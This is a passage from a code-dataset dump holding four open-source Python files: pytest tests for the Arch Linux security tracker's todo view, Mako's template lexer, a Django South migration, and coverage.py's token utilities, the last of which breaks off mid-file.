repo_name
stringlengths
5
100
path
stringlengths
4
375
copies
stringclasses
991 values
size
stringlengths
4
7
content
stringlengths
666
1M
license
stringclasses
15 values
jelly/arch-security-tracker
test/test_todo.py
3
11364
from flask import url_for from tracker.advisory import advisory_get_label from tracker.model.cve import issue_types from tracker.model.enum import Publication from tracker.model.enum import Remote from tracker.model.enum import Severity from tracker.model.enum import Status from .conftest import DEFAULT_ADVISORY_ID from .conftest import DEFAULT_GROUP_ID from .conftest import DEFAULT_GROUP_NAME from .conftest import create_advisory from .conftest import create_group from .conftest import create_issue from .conftest import create_package @create_issue(id='CVE-1111-1111', issue_type=issue_types[2]) @create_issue(id='CVE-1111-2222', issue_type=issue_types[2]) @create_package(name='foo', base='lol', version='1.2.3-4') @create_package(name='bar', base='lol', version='1.2.3-4') @create_group(id=DEFAULT_GROUP_ID, issues=['CVE-1111-1111'], packages=['foo', 'bar'], affected='1.2.3-3', fixed='1.2.3-4') def test_todo_success(db, client): resp = client.get(url_for('tracker.todo')) assert 200 == resp.status_code @create_issue(id='CVE-1111-1111', issue_type=issue_types[2]) @create_issue(id='CVE-1111-2222', issue_type=issue_types[2]) @create_issue(id='CVE-1111-3333', issue_type=issue_types[2], remote=Remote.local, description='w00t', severity=Severity.high) @create_package(name='foo', base='lol', version='1.2.3-4') @create_package(name='bar', base='lol', version='1.2.3-4') @create_group(id=DEFAULT_GROUP_ID, issues=['CVE-1111-1111'], packages=['foo', 'bar'], affected='1.2.3-3', fixed='1.2.3-4') @create_group(id=123, issues=['CVE-1111-2222'], packages=['foo', 'bar'], affected='1.2.3-3', fixed='1.2.3-4') @create_group(id=456, issues=['CVE-1111-2222'], packages=['foo', 'bar'], affected='1.2.3-3') @create_group(id=789, issues=['CVE-1111-2222'], packages=['foo', 'bar'], affected='1.2.3-3', status=Status.unknown) @create_group(id=4242, issues=['CVE-1111-2222'], packages=['foo', 'bar'], affected='1.2.3-4') @create_advisory(id=DEFAULT_ADVISORY_ID, advisory_type='multiple issues') @create_advisory(id=advisory_get_label(number=2), group_package_id=2, advisory_type='multiple issues', publication=Publication.published) def test_todo_json_success(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert data['advisories']['scheduled'] assert data['advisories']['incomplete'] assert data['advisories']['unhandled'] assert data['groups']['unknown'] assert data['groups']['bumped'] assert data['issues']['orphan'] assert data['issues']['unknown'] def test_todo_json_empty(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert not data['advisories']['scheduled'] assert not data['advisories']['incomplete'] assert not data['advisories']['unhandled'] assert not data['groups']['unknown'] assert not data['groups']['bumped'] assert not data['issues']['orphan'] assert not data['issues']['unknown'] @create_issue(id='CVE-1111-1111', issue_type=issue_types[2]) @create_package(name='foo', base='lol', version='1.2.3-4') @create_package(name='bar', base='lol', version='1.2.3-4') @create_group(id=DEFAULT_GROUP_ID, issues=['CVE-1111-1111'], packages=['foo', 'bar'], affected='1.2.3-3', fixed='1.2.3-4') def test_todo_advisory_unhandled(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert 1 == len(data['advisories']['unhandled']) advisory = next(iter(data['advisories']['unhandled'])) assert advisory['name'] == DEFAULT_GROUP_NAME assert advisory['status'] == Status.fixed @create_issue(id='CVE-1111-1111', issue_type=issue_types[2]) @create_package(name='foo', base='lol', version='1.2.3-4') @create_package(name='bar', base='lol', version='1.2.3-4') @create_group(id=DEFAULT_GROUP_ID, issues=['CVE-1111-1111'], packages=['foo', 'bar'], affected='1.2.3-3', fixed='1.2.3-4') @create_advisory(id=DEFAULT_ADVISORY_ID, group_package_id=2, publication=Publication.scheduled) def test_todo_advisory_scheduled(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert 1 == len(data['advisories']['scheduled']) advisory = next(iter(data['advisories']['scheduled'])) assert advisory['name'] == DEFAULT_ADVISORY_ID assert advisory['package'] == 'bar' @create_issue(id='CVE-1111-1111', issue_type=issue_types[2]) @create_package(name='foo', base='lol', version='1.2.3-4') @create_package(name='bar', base='lol', version='1.2.3-4') @create_group(id=DEFAULT_GROUP_ID, issues=['CVE-1111-1111'], packages=['foo', 'bar'], affected='1.2.3-3', fixed='1.2.3-4') @create_advisory(id=DEFAULT_ADVISORY_ID, group_package_id=2, publication=Publication.published) def test_todo_advisory_incomplete(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert 1 == len(data['advisories']['incomplete']) advisory = next(iter(data['advisories']['incomplete'])) assert advisory['name'] == DEFAULT_ADVISORY_ID assert advisory['package'] == 'bar' @create_issue(id='CVE-1111-1111', issue_type=issue_types[2]) @create_package(name='foo', base='lol', version='1.2.3-4') @create_package(name='bar', base='lol', version='1.2.3-4') @create_group(id=DEFAULT_GROUP_ID, issues=['CVE-1111-1111'], packages=['foo', 'bar'], affected='1.2.3-3', fixed='1.2.3-4') @create_advisory(id=DEFAULT_ADVISORY_ID, group_package_id=2, publication=Publication.published, content='broken!', impact='snafu', reference='https://foo.bar') def test_todo_advisory_not_incomplete_with_data(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert not data['advisories']['incomplete'] @create_issue(id='CVE-1111-1111', issue_type=issue_types[0]) @create_package(name='foo', base='lol', version='1.2.3-4') @create_group(id=DEFAULT_GROUP_ID, issues=['CVE-1111-1111'], packages=['foo'], status=Status.unknown, affected='1.2.3-3', fixed='1.2.3-4') def test_todo_group_unknown_by_status(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert 1 == len(data['groups']['unknown']) group = next(iter(data['groups']['unknown'])) assert DEFAULT_GROUP_NAME == group['name'] assert ['foo'] == group['packages'] @create_issue(id='CVE-1111-1111', issue_type=issue_types[1], severity=Severity.high) @create_package(name='foo', base='lol', version='1.2.3-4') @create_group(id=DEFAULT_GROUP_ID, issues=['CVE-1111-1111'], packages=['foo'], status=Status.vulnerable, affected='1.2.3-3', fixed='1.2.3-4') def test_todo_group_not_unknown_with_data(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert not data['groups']['unknown'] @create_issue(id='CVE-1111-1111', issue_type=issue_types[1]) @create_package(name='foo', base='lol', version='1.2.3-4') @create_group(id=DEFAULT_GROUP_ID, issues=['CVE-1111-1111'], packages=['foo'], status=Status.vulnerable, affected='1.2.3-3') def test_todo_group_bumped(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert 1 == len(data['groups']['bumped']) group = next(iter(data['groups']['bumped'])) assert DEFAULT_GROUP_NAME == group['name'] assert ['foo'] == group['packages'] assert '1.2.3-4' in next(iter(group['versions']))['version'] @create_issue(id='CVE-1111-1111', issue_type=issue_types[1]) @create_package(name='foo', base='lol', version='1.2.3-3') @create_group(id=DEFAULT_GROUP_ID, issues=['CVE-1111-1111'], packages=['foo'], status=Status.vulnerable, affected='1.2.3-3') def test_todo_group_not_bumped_when_same(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert not data['groups']['bumped'] @create_issue(id='CVE-1111-1111', issue_type=issue_types[2]) def test_todo_issues_orphan(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert 1 == len(data['issues']['orphan']) issue = next(iter(data['issues']['orphan'])) assert 'CVE-1111-1111' == issue['name'] @create_issue(id='CVE-1111-1111', issue_type=issue_types[2]) @create_package(name='foo', base='lol', version='1.2.3-3') @create_group(id=DEFAULT_GROUP_ID, issues=['CVE-1111-1111'], packages=['foo'], status=Status.vulnerable, affected='1.2.3-3') def test_todo_issues_referenced_not_orphan(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert not data['issues']['orphan'] @create_issue(id='CVE-1111-1111', issue_type=issue_types[2], remote=Remote.remote, severity=Severity.low, description='yay') def test_todo_issues_not_unknown_with_data(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert not data['issues']['unknown'] @create_issue(id='CVE-1111-1111', issue_type=issue_types[0], remote=Remote.remote, severity=Severity.low, description='yay') def test_todo_issues_unknown_without_type(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert 1 == len(data['issues']['unknown']) issue = next(iter(data['issues']['unknown'])) assert 'CVE-1111-1111' == issue['name'] @create_issue(id='CVE-1111-1111', issue_type=issue_types[1], remote=Remote.unknown, severity=Severity.low, description='yay') def test_todo_issues_unknown_without_remote(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert 1 == len(data['issues']['unknown']) issue = next(iter(data['issues']['unknown'])) assert 'CVE-1111-1111' == issue['name'] @create_issue(id='CVE-1111-1111', issue_type=issue_types[0], remote=Remote.remote, severity=Severity.unknown, description='yay') def test_todo_issues_unknown_without_severity(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert 1 == len(data['issues']['unknown']) issue = next(iter(data['issues']['unknown'])) assert 'CVE-1111-1111' == issue['name'] @create_issue(id='CVE-1111-1111', issue_type=issue_types[1], remote=Remote.remote, severity=Severity.low, description='') def test_todo_issues_unknown_without_description(db, client): resp = client.get(url_for('tracker.todo_json', postfix='.json')) assert 200 == resp.status_code data = resp.get_json() assert 1 == len(data['issues']['unknown']) issue = next(iter(data['issues']['unknown'])) assert 'CVE-1111-1111' == issue['name']
mit
jealousrobot/PlexArt
lib/mako/lexer.py
61
16495
# mako/lexer.py # Copyright (C) 2006-2016 the Mako authors and contributors <see AUTHORS file> # # This module is part of Mako and is released under # the MIT License: http://www.opensource.org/licenses/mit-license.php """provides the Lexer class for parsing template strings into parse trees.""" import re import codecs from mako import parsetree, exceptions, compat from mako.pygen import adjust_whitespace _regexp_cache = {} class Lexer(object): def __init__(self, text, filename=None, disable_unicode=False, input_encoding=None, preprocessor=None): self.text = text self.filename = filename self.template = parsetree.TemplateNode(self.filename) self.matched_lineno = 1 self.matched_charpos = 0 self.lineno = 1 self.match_position = 0 self.tag = [] self.control_line = [] self.ternary_stack = [] self.disable_unicode = disable_unicode self.encoding = input_encoding if compat.py3k and disable_unicode: raise exceptions.UnsupportedError( "Mako for Python 3 does not " "support disabling Unicode") if preprocessor is None: self.preprocessor = [] elif not hasattr(preprocessor, '__iter__'): self.preprocessor = [preprocessor] else: self.preprocessor = preprocessor @property def exception_kwargs(self): return {'source': self.text, 'lineno': self.matched_lineno, 'pos': self.matched_charpos, 'filename': self.filename} def match(self, regexp, flags=None): """compile the given regexp, cache the reg, and call match_reg().""" try: reg = _regexp_cache[(regexp, flags)] except KeyError: if flags: reg = re.compile(regexp, flags) else: reg = re.compile(regexp) _regexp_cache[(regexp, flags)] = reg return self.match_reg(reg) def match_reg(self, reg): """match the given regular expression object to the current text position. if a match occurs, update the current text and line position. """ mp = self.match_position match = reg.match(self.text, self.match_position) if match: (start, end) = match.span() if end == start: self.match_position = end + 1 else: self.match_position = end self.matched_lineno = self.lineno lines = re.findall(r"\n", self.text[mp:self.match_position]) cp = mp - 1 while (cp >= 0 and cp < self.textlength and self.text[cp] != '\n'): cp -= 1 self.matched_charpos = mp - cp self.lineno += len(lines) # print "MATCHED:", match.group(0), "LINE START:", # self.matched_lineno, "LINE END:", self.lineno # print "MATCH:", regexp, "\n", self.text[mp : mp + 15], \ # (match and "TRUE" or "FALSE") return match def parse_until_text(self, watch_nesting, *text): startpos = self.match_position text_re = r'|'.join(text) brace_level = 0 paren_level = 0 bracket_level = 0 while True: match = self.match(r'#.*\n') if match: continue match = self.match(r'(\"\"\"|\'\'\'|\"|\')[^\\]*?(\\.[^\\]*?)*\1', re.S) if match: continue match = self.match(r'(%s)' % text_re) if match and not (watch_nesting and (brace_level > 0 or paren_level > 0 or bracket_level > 0)): return \ self.text[startpos: self.match_position - len(match.group(1))],\ match.group(1) elif not match: match = self.match(r"(.*?)(?=\"|\'|#|%s)" % text_re, re.S) if match: brace_level += match.group(1).count('{') brace_level -= match.group(1).count('}') paren_level += match.group(1).count('(') paren_level -= match.group(1).count(')') bracket_level += match.group(1).count('[') bracket_level -= match.group(1).count(']') continue raise exceptions.SyntaxException( "Expected: %s" % ','.join(text), **self.exception_kwargs) def append_node(self, nodecls, *args, **kwargs): kwargs.setdefault('source', self.text) kwargs.setdefault('lineno', self.matched_lineno) kwargs.setdefault('pos', self.matched_charpos) kwargs['filename'] = self.filename node = nodecls(*args, **kwargs) if len(self.tag): self.tag[-1].nodes.append(node) else: self.template.nodes.append(node) # build a set of child nodes for the control line # (used for loop variable detection) # also build a set of child nodes on ternary control lines # (used for determining if a pass needs to be auto-inserted if self.control_line: control_frame = self.control_line[-1] control_frame.nodes.append(node) if not (isinstance(node, parsetree.ControlLine) and control_frame.is_ternary(node.keyword)): if self.ternary_stack and self.ternary_stack[-1]: self.ternary_stack[-1][-1].nodes.append(node) if isinstance(node, parsetree.Tag): if len(self.tag): node.parent = self.tag[-1] self.tag.append(node) elif isinstance(node, parsetree.ControlLine): if node.isend: self.control_line.pop() self.ternary_stack.pop() elif node.is_primary: self.control_line.append(node) self.ternary_stack.append([]) elif self.control_line and \ self.control_line[-1].is_ternary(node.keyword): self.ternary_stack[-1].append(node) elif self.control_line and \ not self.control_line[-1].is_ternary(node.keyword): raise exceptions.SyntaxException( "Keyword '%s' not a legal ternary for keyword '%s'" % (node.keyword, self.control_line[-1].keyword), **self.exception_kwargs) _coding_re = re.compile(r'#.*coding[:=]\s*([-\w.]+).*\r?\n') def decode_raw_stream(self, text, decode_raw, known_encoding, filename): """given string/unicode or bytes/string, determine encoding from magic encoding comment, return body as unicode or raw if decode_raw=False """ if isinstance(text, compat.text_type): m = self._coding_re.match(text) encoding = m and m.group(1) or known_encoding or 'ascii' return encoding, text if text.startswith(codecs.BOM_UTF8): text = text[len(codecs.BOM_UTF8):] parsed_encoding = 'utf-8' m = self._coding_re.match(text.decode('utf-8', 'ignore')) if m is not None and m.group(1) != 'utf-8': raise exceptions.CompileException( "Found utf-8 BOM in file, with conflicting " "magic encoding comment of '%s'" % m.group(1), text.decode('utf-8', 'ignore'), 0, 0, filename) else: m = self._coding_re.match(text.decode('utf-8', 'ignore')) if m: parsed_encoding = m.group(1) else: parsed_encoding = known_encoding or 'ascii' if decode_raw: try: text = text.decode(parsed_encoding) except UnicodeDecodeError: raise exceptions.CompileException( "Unicode decode operation of encoding '%s' failed" % parsed_encoding, text.decode('utf-8', 'ignore'), 0, 0, filename) return parsed_encoding, text def parse(self): self.encoding, self.text = self.decode_raw_stream( self.text, not self.disable_unicode, self.encoding, self.filename) for preproc in self.preprocessor: self.text = preproc(self.text) # push the match marker past the # encoding comment. self.match_reg(self._coding_re) self.textlength = len(self.text) while (True): if self.match_position > self.textlength: break if self.match_end(): break if self.match_expression(): continue if self.match_control_line(): continue if self.match_comment(): continue if self.match_tag_start(): continue if self.match_tag_end(): continue if self.match_python_block(): continue if self.match_text(): continue if self.match_position > self.textlength: break raise exceptions.CompileException("assertion failed") if len(self.tag): raise exceptions.SyntaxException("Unclosed tag: <%%%s>" % self.tag[-1].keyword, **self.exception_kwargs) if len(self.control_line): raise exceptions.SyntaxException( "Unterminated control keyword: '%s'" % self.control_line[-1].keyword, self.text, self.control_line[-1].lineno, self.control_line[-1].pos, self.filename) return self.template def match_tag_start(self): match = self.match(r''' \<% # opening tag ([\w\.\:]+) # keyword ((?:\s+\w+|\s*=\s*|".*?"|'.*?')*) # attrname, = \ # sign, string expression \s* # more whitespace (/)?> # closing ''', re.I | re.S | re.X) if match: keyword, attr, isend = match.groups() self.keyword = keyword attributes = {} if attr: for att in re.findall( r"\s*(\w+)\s*=\s*(?:'([^']*)'|\"([^\"]*)\")", attr): key, val1, val2 = att text = val1 or val2 text = text.replace('\r\n', '\n') attributes[key] = text self.append_node(parsetree.Tag, keyword, attributes) if isend: self.tag.pop() else: if keyword == 'text': match = self.match(r'(.*?)(?=\</%text>)', re.S) if not match: raise exceptions.SyntaxException( "Unclosed tag: <%%%s>" % self.tag[-1].keyword, **self.exception_kwargs) self.append_node(parsetree.Text, match.group(1)) return self.match_tag_end() return True else: return False def match_tag_end(self): match = self.match(r'\</%[\t ]*(.+?)[\t ]*>') if match: if not len(self.tag): raise exceptions.SyntaxException( "Closing tag without opening tag: </%%%s>" % match.group(1), **self.exception_kwargs) elif self.tag[-1].keyword != match.group(1): raise exceptions.SyntaxException( "Closing tag </%%%s> does not match tag: <%%%s>" % (match.group(1), self.tag[-1].keyword), **self.exception_kwargs) self.tag.pop() return True else: return False def match_end(self): match = self.match(r'\Z', re.S) if match: string = match.group() if string: return string else: return True else: return False def match_text(self): match = self.match(r""" (.*?) # anything, followed by: ( (?<=\n)(?=[ \t]*(?=%|\#\#)) # an eval or line-based # comment preceded by a # consumed newline and whitespace | (?=\${) # an expression | (?=</?[%&]) # a substitution or block or call start or end # - don't consume | (\\\r?\n) # an escaped newline - throw away | \Z # end of string )""", re.X | re.S) if match: text = match.group(1) if text: self.append_node(parsetree.Text, text) return True else: return False def match_python_block(self): match = self.match(r"<%(!)?") if match: line, pos = self.matched_lineno, self.matched_charpos text, end = self.parse_until_text(False, r'%>') # the trailing newline helps # compiler.parse() not complain about indentation text = adjust_whitespace(text) + "\n" self.append_node( parsetree.Code, text, match.group(1) == '!', lineno=line, pos=pos) return True else: return False def match_expression(self): match = self.match(r"\${") if match: line, pos = self.matched_lineno, self.matched_charpos text, end = self.parse_until_text(True, r'\|', r'}') if end == '|': escapes, end = self.parse_until_text(True, r'}') else: escapes = "" text = text.replace('\r\n', '\n') self.append_node( parsetree.Expression, text, escapes.strip(), lineno=line, pos=pos) return True else: return False def match_control_line(self): match = self.match( r"(?<=^)[\t ]*(%(?!%)|##)[\t ]*((?:(?:\\r?\n)|[^\r\n])*)" r"(?:\r?\n|\Z)", re.M) if match: operator = match.group(1) text = match.group(2) if operator == '%': m2 = re.match(r'(end)?(\w+)\s*(.*)', text) if not m2: raise exceptions.SyntaxException( "Invalid control line: '%s'" % text, **self.exception_kwargs) isend, keyword = m2.group(1, 2) isend = (isend is not None) if isend: if not len(self.control_line): raise exceptions.SyntaxException( "No starting keyword '%s' for '%s'" % (keyword, text), **self.exception_kwargs) elif self.control_line[-1].keyword != keyword: raise exceptions.SyntaxException( "Keyword '%s' doesn't match keyword '%s'" % (text, self.control_line[-1].keyword), **self.exception_kwargs) self.append_node(parsetree.ControlLine, keyword, isend, text) else: self.append_node(parsetree.Comment, text) return True else: return False def match_comment(self): """matches the multiline version of a comment""" match = self.match(r"<%doc>(.*?)</%doc>", re.S) if match: self.append_node(parsetree.Comment, match.group(1)) return True else: return False
gpl-3.0
drawquest/drawquest-web
website/drawquest/apps/quests/migrations/0001_initial.py
2
9728
# encoding: utf-8 import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Adding model 'ScheduledQuest' db.create_table('quests_scheduledquest', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('comment', self.gf('django.db.models.fields.related.ForeignKey')(related_name='scheduled_quests', to=orm['canvas.Comment'])), ('curator', self.gf('django.db.models.fields.related.ForeignKey')(default=None, related_name='scheduled_quests', null=True, blank=True, to=orm['auth.User'])), ('timestamp', self.gf('canvas.util.UnixTimestampField')(default=0)), ('sort', self.gf('django.db.models.fields.IntegerField')()), )) db.send_create_signal('quests', ['ScheduledQuest']) def backwards(self, orm): # Deleting model 'ScheduledQuest' db.delete_table('quests_scheduledquest') models = { 'auth.group': { 'Meta': {'object_name': 'Group'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}) }, 'auth.permission': { 'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, 'auth.user': { 'Meta': {'object_name': 'User'}, 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '254', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}), 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) }, 'canvas.category': { 'Meta': {'object_name': 'Category'}, 'description': ('django.db.models.fields.CharField', [], {'max_length': '140'}), 'founded': ('django.db.models.fields.FloatField', [], {'default': '1298956320'}), 'founder': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'founded_groups'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'moderators': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'moderated_categories'", 'symmetrical': 'False', 'to': "orm['auth.User']"}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '20'}), 'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'canvas.comment': { 'Meta': {'object_name': 'Comment'}, 'anonymous': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'author': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'comments'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"}), 'category': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'comments'", 'null': 'True', 'blank': 'True', 'to': "orm['canvas.Category']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'ip': ('django.db.models.fields.IPAddressField', [], {'default': "'0.0.0.0'", 'max_length': '15'}), 'judged': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'ot_hidden': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'parent_comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'replies'", 'null': 'True', 'blank': 'True', 'to': "orm['canvas.Comment']"}), 'parent_content': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'comments'", 'null': 'True', 'to': "orm['canvas.Content']"}), 'replied_comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['canvas.Comment']", 'null': 'True', 'blank': 'True'}), 'reply_content': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'used_in_comments'", 'null': 'True', 'to': "orm['canvas.Content']"}), 'reply_text': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'blank': 'True'}), 'score': ('django.db.models.fields.FloatField', [], {'default': '0', 'db_index': 'True'}), 'timestamp': ('canvas.util.UnixTimestampField', [], {'default': '0'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '140', 'blank': 'True'}), 'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'canvas.content': { 'Meta': {'object_name': 'Content'}, 'alpha': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'animated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'id': ('django.db.models.fields.CharField', [], {'max_length': '40', 'primary_key': 'True'}), 'ip': ('django.db.models.fields.IPAddressField', [], {'default': "'0.0.0.0'", 'max_length': '15'}), 'remix_of': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'remixes'", 'null': 'True', 'to': "orm['canvas.Content']"}), 'remix_text': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1000', 'blank': 'True'}), 'source_url': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '4000', 'blank': 'True'}), 'stamps_used': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'used_as_stamp'", 'blank': 'True', 'to': "orm['canvas.Content']"}), 'timestamp': ('canvas.util.UnixTimestampField', [], {}), 'url_mapping': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.ContentUrlMapping']", 'null': 'True', 'blank': 'True'}), 'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'canvas.contenturlmapping': { 'Meta': {'object_name': 'ContentUrlMapping'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}) }, 'canvas_auth.user': { 'Meta': {'object_name': 'User', 'db_table': "'auth_user'", '_ormbases': ['auth.User'], 'proxy': 'True'} }, 'contenttypes.contenttype': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) }, 'quests.scheduledquest': { 'Meta': {'ordering': "['sort']", 'object_name': 'ScheduledQuest'}, 'comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'scheduled_quests'", 'to': "orm['canvas.Comment']"}), 'curator': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'scheduled_quests'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'sort': ('django.db.models.fields.IntegerField', [], {}), 'timestamp': ('canvas.util.UnixTimestampField', [], {'default': '0'}) } } complete_apps = ['quests']
bsd-3-clause
tmpgit/intellij-community
python/helpers/coverage/phystokens.py
160
7401
"""Better tokenizing for coverage.py.""" import codecs, keyword, re, sys, token, tokenize from coverage.backward import set # pylint: disable=W0622 from coverage.parser import generate_tokens def phys_tokens(toks): """Return all physical tokens, even line continuations. tokenize.generate_tokens() doesn't return a token for the backslash that continues lines. This wrapper provides those tokens so that we can re-create a faithful representation of the original source. Returns the same values as generate_tokens() """ last_line = None last_lineno = -1 last_ttype = None for ttype, ttext, (slineno, scol), (elineno, ecol), ltext in toks: if last_lineno != elineno: if last_line and last_line.endswith("\\\n"): # We are at the beginning of a new line, and the last line # ended with a backslash. We probably have to inject a # backslash token into the stream. Unfortunately, there's more # to figure out. This code:: # # usage = """\ # HEY THERE # """ # # triggers this condition, but the token text is:: # # '"""\\\nHEY THERE\n"""' # # so we need to figure out if the backslash is already in the # string token or not. inject_backslash = True if last_ttype == tokenize.COMMENT: # Comments like this \ # should never result in a new token. inject_backslash = False elif ttype == token.STRING: if "\n" in ttext and ttext.split('\n', 1)[0][-1] == '\\': # It's a multiline string and the first line ends with # a backslash, so we don't need to inject another. inject_backslash = False if inject_backslash: # Figure out what column the backslash is in. ccol = len(last_line.split("\n")[-2]) - 1 # Yield the token, with a fake token type. yield ( 99999, "\\\n", (slineno, ccol), (slineno, ccol+2), last_line ) last_line = ltext last_ttype = ttype yield ttype, ttext, (slineno, scol), (elineno, ecol), ltext last_lineno = elineno def source_token_lines(source): """Generate a series of lines, one for each line in `source`. Each line is a list of pairs, each pair is a token:: [('key', 'def'), ('ws', ' '), ('nam', 'hello'), ('op', '('), ... ] Each pair has a token class, and the token text. If you concatenate all the token texts, and then join them with newlines, you should have your original `source` back, with two differences: trailing whitespace is not preserved, and a final line with no newline is indistinguishable from a final line with a newline. """ ws_tokens = set([token.INDENT, token.DEDENT, token.NEWLINE, tokenize.NL]) line = [] col = 0 source = source.expandtabs(8).replace('\r\n', '\n') tokgen = generate_tokens(source) for ttype, ttext, (_, scol), (_, ecol), _ in phys_tokens(tokgen): mark_start = True for part in re.split('(\n)', ttext): if part == '\n': yield line line = [] col = 0 mark_end = False elif part == '': mark_end = False elif ttype in ws_tokens: mark_end = False else: if mark_start and scol > col: line.append(("ws", " " * (scol - col))) mark_start = False tok_class = tokenize.tok_name.get(ttype, 'xx').lower()[:3] if ttype == token.NAME and keyword.iskeyword(ttext): tok_class = "key" line.append((tok_class, part)) mark_end = True scol = 0 if mark_end: col = ecol if line: yield line def source_encoding(source): """Determine the encoding for `source` (a string), according to PEP 263. Returns a string, the name of the encoding. """ # Note: this function should never be called on Python 3, since py3 has # built-in tools to do this. assert sys.version_info < (3, 0) # This is mostly code adapted from Py3.2's tokenize module. cookie_re = 